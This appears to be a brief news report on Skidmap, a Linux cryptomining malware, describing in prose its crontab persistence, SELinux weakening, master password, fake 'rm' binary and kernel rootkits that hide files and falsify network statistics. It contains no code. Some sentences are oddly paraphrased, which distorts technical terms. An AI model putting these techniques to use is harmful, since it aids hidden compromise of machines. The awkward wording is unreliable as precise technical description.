By 
According to a report, a recently exposed cryptocurrency mining malware targeting Linux machines is engaging kernel-mode rootkits in a bid to make finding more problematic.
The malware, called Skidmap, can also establish a clandestine master password that provides it with access to any user account on the system.
A number of the miner’s routines need root access, signifying that its attack vector is the same that offered the attackers root or administrative access to the system.
The threat connects itself via crontab, after which the installation script downloads the chief binary. It reduces the system’s security situations either by arranging the SELinux module to permissive approach or by incapacitating the SELinux policy and setting designated processes to run in limited domains.
The major binary checks whether the system runs on Debian or RHEL/CentOS, and drops the miner and other mechanisms based on that.
Other Skidmap mechanisms allow it to complicate its activities and ensure that they continue to run.
Researchers have discovered that first of these mechanisms is a fake “rm” binary that substitutes the original. This file establishes a malicious cron job to download and perform a file, but the routine would only be performed arbitrarily.
The threat uses precise modules for different kernel versions, which guarantees that the dropped kernel-mode rootkits won’t smash the system.
A third module is “iproute,” intended to peg the system call getdents, which is generally used to read the contents of a directory, to conceal specific files.
The final component is “netlink,” a rootkit that can change the network traffic statistics.
